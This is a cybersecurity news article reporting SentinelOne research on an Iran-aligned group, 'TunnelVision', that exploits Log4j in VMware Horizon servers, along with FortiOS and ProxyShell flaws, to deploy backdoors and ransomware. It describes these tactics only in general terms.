Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware

A “potentially destructive actor” aligned with the government of
Iran is actively exploiting the well-known Log4j vulnerability ^[1]
to infect unpatched VMware Horizon servers with ransomware.

Cybersecurity firm SentinelOne dubbed the group
“TunnelVision” owing to their heavy reliance on
tunneling tools, with overlaps in tactics observed to that of a
broader group tracked under the moniker Phosphorus ^[2]
as well as Charming Kitten and Nemesis Kitten.

“TunnelVision activities are characterized by wide-exploitation
of 1-day vulnerabilities in target regions,” SentinelOne
researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said ^[3]
in a report, with the intrusions detected in the Middle East and
the U.S.

Also observed alongside Log4Shell is the exploitation of
Fortinet FortiOS path traversal flaw (CVE-2018-13379 ^[4]) and the Microsoft
Exchange ProxyShell ^[5]
vulnerability to gain initial access into the target networks for
post-exploitation.

“TunnelVision attackers have been actively exploiting the
vulnerability to run malicious PowerShell commands, deploy
backdoors, create backdoor users, harvest credentials and perform
lateral movement,” the researchers said.

The PowerShell commands are used as a launchpad to download
tools like Ngrok and run further commands by means of reverse
shells that are employed to drop a PowerShell backdoor that’s
capable of gathering credentials and executing reconnaissance
commands.

SentinelOne also said it identified similarities in the
mechanism used to execute the reverse web shell with another
PowerShell-based implant called PowerLess ^[6]
that was disclosed by Cybereason researchers earlier this
month.

All through the activity, the threat actor is said to have
utilized a GitHub repository known as “VmWareHorizon” under the
username “protections20” to host the malicious payloads.

The cybersecurity company said it’s associating the attacks to a
separate Iranian cluster not because they are unrelated, but owing
to the fact that “there is at present insufficient data to treat
them as identical to any of the aforementioned attributions.”

References

^{^}
Log4j
vulnerability (thehackernews.com)
^{^}
Phosphorus
(thehackernews.com)
^{^}
said
(www.sentinelone.com)
^{^}
CVE-2018-13379
(thehackernews.com)
^{^}
ProxyShell
(thehackernews.com)
^{^}
PowerLess
(thehackernews.com)